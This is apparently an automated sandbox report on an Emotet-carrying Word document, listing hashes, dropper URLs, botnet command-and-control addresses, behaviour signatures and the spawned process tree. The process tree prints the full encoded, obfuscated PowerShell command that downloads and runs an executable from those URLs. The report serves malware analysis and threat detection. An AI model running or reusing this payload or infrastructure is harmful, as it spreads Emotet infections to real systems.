Analysis

  • max time kernel
    30s
  • max time network
    32s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    27-10-2020 16:48

General

  • Target

    9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893.doc

  • Size

    179KB

  • MD5

    195b26f04a16b641bdcecc5084ca815d

  • SHA1

    8b87e7f06c75a926103c28fd0b7b8fab532af1a4

  • SHA256

    9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893

  • SHA512

    54591f496f64ecbb54158c0c175a3499b4cd7fc346bef6a5439f31f783068dcefc4f626f0e11d72607817103fa9e6c9fb0e85ef4ce146cec491dcd3d0aed3236

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://car4libya.com/cgi-bin/sDBhPqx/

exe.dropper

http://ostranderandassociates.com/var/thpY/

exe.dropper

http://acredales.com/thank_you/U0u9Z/

exe.dropper

http://scw8.net/wp-content/1MkWc/

exe.dropper

https://adinterix.com/laybuy-investors/9Ab6/

exe.dropper

http://uxnew.com/old/9/

exe.dropper

http://www.queensport.nl/accp/dz/

exe.dropper

https://bahamianrelief.org/VpHo/ey/

Extracted

Family

emotet

Botnet

Epoch2

C2

67.163.161.107:80

107.170.146.252:8080

173.212.214.235:7080

167.114.153.111:8080

185.94.252.104:443

110.142.236.207:80

194.187.133.160:443

218.147.193.146:80

172.104.97.173:8080

216.139.123.119:80

50.91.114.38:80

202.134.4.211:8080

113.61.66.94:80

139.99.158.11:443

62.171.142.179:8080

37.139.21.175:8080

190.108.228.27:443

94.23.237.171:443

154.91.33.137:443

201.241.127.190:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3876
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD IAAgAFMAZQBUAC0ASQBUAGUATQAgAFYAYQByAEkAQQBiAEwARQA6AE0AQgBPAE4AOAA5ACAAIAAoACAAWwBUAHkAUABlAF0AKAAiAHsAMAB9AHsANAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACcAcwAnACwAJwAuAEQASQByACcALAAnAGUAYwBUAG8AUgB5ACcALAAnAGkATwAnACwAJwB5AHMAdABlAG0ALgAnACkAKQA7ACQAYQA0AGcAZQBLACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADAAfQB7ADYAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADMAfQB7ADIAfQB7ADEAfQB7ADUAfQAiAC0AZgAgACcAcwBZACcALAAnAEkATgBUAG0AQQBOAEEAZwBlACcALAAnAFAATwAnACwAJwBjAEUAJwAsACcAbgBFAFQAJwAsACcAUgAnACwAJwBzAHQAZQAnACwAJwBtAC4AJwAsACcALgBTAGUAcgBWAEkAJwApADsAJABUAHUAegAzAHEANAA2AD0AKAAoACcARwA3ACcAKwAnAGQAJwApACsAKAAnADUAJwArACcAbwAxAG4AJwApACkAOwAkAEcAXwBqAHUAXwAxAGwAPQAkAEEAcgB4AGoAYQA5AHEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUANgB0ADEAdQBzAGsAOwAkAE4AZQA1AHEAYgB0ADMAPQAoACgAJwBEAHQAJwArACcANgAnACkAKwAoACcAagBvACcAKwAnADEAJwApACsAJwB4ACcAKQA7ACAAKAB2AGEAcgBJAEEAYgBsAEUAIAAgAE0AQgBPAE4AOAA5ACAAIAAtAFYAQQBsAFUARQBvAG4ATAApADoAOgAiAEMAYABSAEUAYQBUAEUAYABEAGkAcgBFAGAAYwBUAG8AYABSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEQAWAAnACsAJwAxACcAKwAnAE4AXwBqACcAKQArACgAJwBkAGUAJwArACcAcwAnACkAKwAoACcAdQAnACsAJwBEAFgAMQBOADYAcQAnACsAJwB3ADAAJwArACcAegAnACkAKwAoACcAcgBEACcAKwAnAFgAJwApACsAJwAxACcAKQAuACIAcgBlAFAAYABMAGEAYABjAGUAIgAoACgAJwBEAFgAJwArACcAMQAnACkALAAnAFwAJwApACkAKQA7ACQATQAwAHYAcwBjAGgAZQA9ACgAJwBDACcAKwAoACcAaQB4AHcAJwArACcAawAnACkAKwAnAGUAZwAnACkAOwAgACgAIAAgAEMAaABpAEwARABJAFQAZQBNACAAIAB2AEEAcgBJAEEAYgBsAEUAOgBBADQAZwBFAEsAKQAuAHYAYQBMAFUARQA6ADoAIgBzAGAAZQBDAHUAcgBgAEkAdABZAFAAUgBPAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABQAHUAbABqADcAOQBxAD0AKAAnAFMAJwArACgAJwA4AGUAcwBjAGgAJwArACcAYwAnACkAKQA7ACQARgBsAHoAZwBqAGoAYgAgAD0AIAAoACgAJwBGADEAJwArACcAaQB2ACcAKQArACgAJwA5ADQAJwArACcAcwAnACkAKQA7ACQAQQBhAG4ANQA4AGcAcQA9ACgAKAAnAEkAZQAnACsAJwB5ADYAJwApACsAKAAnAHAAbwAnACsAJwA5ACcAKQApADsAJABOAGQANABmAGMAdwAyAD0AKAAoACcARABnAG8AdQAnACsAJwA4ACcAKQArACcAdwAnACsAJwA0ACcAKQA7ACQAUwBtAGUAbQA1AHkAagA9ACQASABPAE0ARQArACgAKAAoACcAYwBTACcAKwAnAGsAJwApACsAJwBOAF8AJwArACgAJwBqAGQAJwArACcAZQAnACkAKwAnAHMAJwArACgAJwB1ACcAKwAnAGMAUwBrACcAKwAnAE4ANgBxAHcAJwApACsAKAAnADAAegAnACsAJwByACcAKwAnAGMAUwBrACcAKQApACAALQBSAEUAUABsAGEAQwBlACAAIAAoAFsAQwBIAGEAcgBdADkAOQArAFsAQwBIAGEAcgBdADgAMwArAFsAQwBIAGEAcgBdADEAMAA3ACkALABbAEMASABhAHIAXQA5ADIAKQArACQARgBsAHoAZwBqAGoAYgArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEIAXwBqADcAdQB4AHYAPQAoACcATAAnACsAKAAnAGUAJwArACcAZgAwACcAKQArACgAJwB0AGkAJwArACcAYQAnACkAKQA7ACQATwBuAG8AXwBxAGkANQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQAUgAzAGkAeQA4AHgANgA9ACgAJwBoACcAKwAnAHQAJwArACgAJwB0ACcAKwAnAHAAOgBbACcAKwAnACAAdwBlACAAXQAnACkAKwAoACcAWwAgAHcAJwArACcAZQAnACkAKwAoACcAIABdAGMAYQAnACsAJwByACcAKQArACgAJwA0AGwAaQBiACcAKwAnAHkAYQAnACkAKwAoACcALgAnACsAJwBjAG8AbQBbACAAJwApACsAJwB3ACcAKwAoACcAZQAnACsAJwAgACcAKwAnAF0AJwArACcAYwBnAGkALQBiAGkAbgAnACkAKwAoACcAWwAnACsAJwAgACcAKwAnAHcAZQAgAF0AcwBEAEIAJwApACsAKAAnAGgAJwArACcAUABxACcAKQArACcAeABbACcAKwAoACcAIAAnACsAJwB3AGUAJwApACsAJwAgACcAKwAnAF0AJwArACgAJwBAACcAKwAnAGgAdAB0ACcAKQArACgAJwBwADoAWwAnACsAJwAgACcAKQArACcAdwAnACsAKAAnAGUAIABdAFsAIAB3AGUAJwArACcAIABdACcAKQArACgAJwBvAHMAJwArACcAdAByAGEAJwApACsAJwBuACcAKwAoACcAZABlAHIAJwArACcAYQBuAGQAJwArACcAYQAnACkAKwAoACcAcwBzACcAKwAnAG8AYwAnACsAJwBpAGEAdAAnACsAJwBlAHMAJwApACsAKAAnAC4AYwBvAG0AWwAgAHcAJwArACcAZQAgACcAKwAnAF0AJwApACsAKAAnAHYAYQAnACsAJwByACcAKQArACgAJwBbACAAJwArACcAdwAnACkAKwAoACcAZQAgAF0AdAAnACsAJwBoAHAAWQBbACcAKQArACcAIAB3ACcAKwAoACcAZQAgAF0AJwArACcAQABoACcAKwAnAHQAdABwADoAJwArACcAWwAgACcAKwAnAHcAZQAgAF0AWwAgACcAKQArACgAJwB3AGUAJwArACcAIABdAGEAYwAnACsAJwByAGUAZABhACcAKwAnAGwAZQAnACkAKwAnAHMAJwArACgAJwAuACcAKwAnAGMAbwBtAFsAJwApACsAKAAnACAAdwBlACAAXQAnACsAJwB0ACcAKwAnAGgAJwApACsAJwBhACcAKwAoACcAbgBrACcAKwAnAF8AJwApACsAKAAnAHkAbwAnACsAJwB1ACcAKQArACgAJwBbACcAKwAnACAAdwBlACAAJwApACsAKAAnAF0AVQAnACsAJwAwACcAKQArACgAJwB1ACcAKwAnADkAWgAnACsAJwBbACAAdwBlACcAKwAnACAAXQBAAGgAdAAnACsAJwB0AHAAOgBbACAAdwBlACcAKQArACgAJwAgAF0AWwAgACcAKwAnAHcAJwArACcAZQAgAF0AJwApACsAJwBzACcAKwAnAGMAJwArACgAJwB3ACcAKwAnADgALgBuAGUAdAAnACkAKwAoACcAWwAgAHcAJwArACcAZQAnACkAKwAnACAAXQAnACsAKAAnAHcAcAAtACcAKwAnAGMAbwBuAHQAZQBuACcAKwAnAHQAWwAgAHcAZQAgACcAKQArACgAJwBdADEATQBrACcAKwAnAFcAJwApACsAKAAnAGMAJwArACcAWwAnACsAJwAgAHcAZQAgAF0AQABoACcAKQArACgAJwB0ACcAKwAnAHQAcABzACcAKQArACcAOgBbACcAKwAnACAAJwArACgAJwB3AGUAJwArACcAIABdACcAKQArACcAWwAnACsAJwAgACcAKwAoACcAdwBlACcAKwAnACAAXQBhAGQAaQAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAcgBpAHgALgAnACkAKwAoACcAYwBvAG0AWwAgACcAKwAnAHcAJwArACcAZQAnACkAKwAnACAAXQAnACsAKAAnAGwAYQB5ACcAKwAnAGIAdQB5ACcAKwAnAC0AaQBuAHYAJwApACsAKAAnAGUAcwAnACsAJwB0ACcAKwAnAG8AcgBzAFsAJwArACcAIAB3AGUAIABdACcAKwAnADkAQQBiADYAWwAgAHcAJwApACsAKAAnAGUAIABdAEAAaAB0ACcAKwAnAHQAcAAnACsAJwA6AFsAJwArACcAIAAnACkAKwAoACcAdwAnACsAJwBlACAAJwApACsAJwBdACcAKwAoACcAWwAgAHcAZQAgAF0AdQAnACsAJwB4ACcAKwAnAG4AJwApACsAJwBlAHcAJwArACcALgBjACcAKwAoACcAbwAnACsAJwBtAFsAIAB3ACcAKwAnAGUAIABdAG8AJwApACsAKAAnAGwAZABbACAAJwArACcAdwAnACkAKwAoACcAZQAgACcAKwAnAF0AOQBbACcAKQArACcAIAB3ACcAKwAnAGUAJwArACgAJwAgACcAKwAnAF0AQAAnACkAKwAnAGgAdAAnACsAJwB0ACcAKwAoACcAcAA6AFsAJwArACcAIAAnACsAJwB3AGUAIABdACcAKwAnAFsAJwApACsAKAAnACAAdwBlACcAKwAnACAAXQB3AHcAJwApACsAKAAnAHcALgAnACsAJwBxACcAKQArACgAJwB1AGUAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwBzAHAAbwByAHQALgBuACcAKwAnAGwAWwAgAHcAJwArACcAZQAnACsAJwAgAF0AYQAnACsAJwBjAGMAJwApACsAKAAnAHAAWwAgACcAKwAnAHcAZQAnACkAKwAoACcAIABdAGQAegAnACsAJwBbACAAdwAnACsAJwBlACcAKwAnACAAXQAnACsAJwBAAGgAdAAnACsAJwB0AHAAcwA6ACcAKQArACgAJwBbACcAKwAnACAAdwBlACcAKQArACgAJwAgAF0AJwArACcAWwAgAHcAJwArACcAZQAgAF0AYgBhACcAKQArACgAJwBoACcAKwAnAGEAbQAnACkAKwAoACcAaQBhAG4AJwArACcAcgBlACcAKwAnAGwAaQBlAGYAJwApACsAJwAuAG8AJwArACgAJwByAGcAWwAnACsAJwAgAHcAJwArACcAZQAgAF0AJwApACsAKAAnAFYAJwArACcAcAAnACsAJwBIAG8AWwAgAHcAZQAgACcAKwAnAF0AZQB5AFsAIAAnACkAKwAoACcAdwAnACsAJwBlACAAXQAnACkAKQAuACIAcgBgAGUAYABQAGwAYQBDAGUAIgAoACgAJwBbACAAJwArACcAdwBlACcAKwAnACAAXQAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAJwBmAHMAJwApAFsAMABdACkALgAiAFMAYABQAEwAaQB0ACIAKAAkAFUAeQBjADYAXwBtAGoAIAArACAAJABHAF8AagB1AF8AMQBsACAAKwAgACQASABxAHkAMQAzADgAZQApADsAJABJADcANABxAGYAYgBhAD0AKAAoACcATQBrACcAKwAnAHoAMAByACcAKQArACcAMwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQASwAzAGQAeABzAG0ANQAgAGkAbgAgACQAUgAzAGkAeQA4AHgANgApAHsAdAByAHkAewAkAE8AbgBvAF8AcQBpADUALgAiAGQAbwB3AGAATgBsAE8AQQBEAGAARgBJAEwARQAiACgAJABLADMAZAB4AHMAbQA1ACwAIAAkAFMAbQBlAG0ANQB5AGoAKQA7ACQARQB1ADIAaQB1ADAANAA9ACgAJwBTADYAJwArACgAJwB3AGQAJwArACcAMAA3ADIAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQAUwBtAGUAbQA1AHkAagApAC4AIgBMAEUAbgBgAGcAdABoACIAIAAtAGcAZQAgADQAMAA5ADcAMwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAaQAnACsAKAAnAG4AMwAyAF8AJwArACcAUAAnACkAKwAoACcAcgBvACcAKwAnAGMAZQAnACkAKwAnAHMAcwAnACkAKQAuACIAQwBSAGAAZQBgAEEAVABlACIAKAAkAFMAbQBlAG0ANQB5AGoAKQA7ACQASwB4AHkAcQB2AHoAMwA9ACgAKAAnAEUAbQAnACsAJwAxACcAKQArACcAeABsACcAKwAnADkAcwAnACkAOwBiAHIAZQBhAGsAOwAkAFQAdQBoAGYANwBoAG4APQAoACcAQgAnACsAKAAnADIAJwArACcAawBwACcAKQArACgAJwA4ACcAKwAnADkAeAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAAwAGMAZgB6AHIAdgA9ACgAJwBaAHYAJwArACgAJwBuAHcAZAAnACsAJwBjAG8AJwApACkA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2268
  • C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
    C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:3964
    • C:\Windows\SysWOW64\IDStore\wsmprovhost.exe
      "C:\Windows\SysWOW64\IDStore\wsmprovhost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1140

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
    MD5

    44159153fabe28642e068351999c5573

    SHA1

    725f004ce99979aa808fa1bfd1d33d0b84146780

    SHA256

    e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62

    SHA512

    8f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9

  • C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
    MD5

    44159153fabe28642e068351999c5573

    SHA1

    725f004ce99979aa808fa1bfd1d33d0b84146780

    SHA256

    e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62

    SHA512

    8f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9

  • C:\Windows\SysWOW64\IDStore\wsmprovhost.exe
    MD5

    44159153fabe28642e068351999c5573

    SHA1

    725f004ce99979aa808fa1bfd1d33d0b84146780

    SHA256

    e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62

    SHA512

    8f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9

  • memory/1140-18-0x0000000000900000-0x000000000091E000-memory.dmp
    Filesize

    120KB

  • memory/1140-17-0x00000000008E0000-0x0000000000900000-memory.dmp
    Filesize

    128KB

  • memory/1140-15-0x0000000000000000-mapping.dmp
  • memory/2268-8-0x00007FF991260000-0x00007FF991C4C000-memory.dmp
    Filesize

    9MB

  • memory/2268-9-0x000002F47A650000-0x000002F47A651000-memory.dmp
    Filesize

    4KB

  • memory/2268-10-0x000002F47AAC0000-0x000002F47AAC1000-memory.dmp
    Filesize

    4KB

  • memory/3876-7-0x00000278B249A000-0x00000278B249F000-memory.dmp
    Filesize

    20KB

  • memory/3876-0-0x00007FF998610000-0x00007FF998C47000-memory.dmp
    Filesize

    6MB

  • memory/3876-6-0x00000278AFC5C000-0x00000278AFC61000-memory.dmp
    Filesize

    20KB

  • memory/3876-5-0x00000278B2281000-0x00000278B2286000-memory.dmp
    Filesize

    20KB

  • memory/3876-4-0x00000278B2281000-0x00000278B2286000-memory.dmp
    Filesize

    20KB

  • memory/3876-3-0x00000278B2286000-0x00000278B228B000-memory.dmp
    Filesize

    20KB

  • memory/3876-2-0x00000278B2281000-0x00000278B2286000-memory.dmp
    Filesize

    20KB

  • memory/3876-1-0x00000278B2286000-0x00000278B228B000-memory.dmp
    Filesize

    20KB

  • memory/3964-13-0x00000000006D0000-0x00000000006F0000-memory.dmp
    Filesize

    128KB

  • memory/3964-14-0x0000000000710000-0x000000000072E000-memory.dmp
    Filesize

    120KB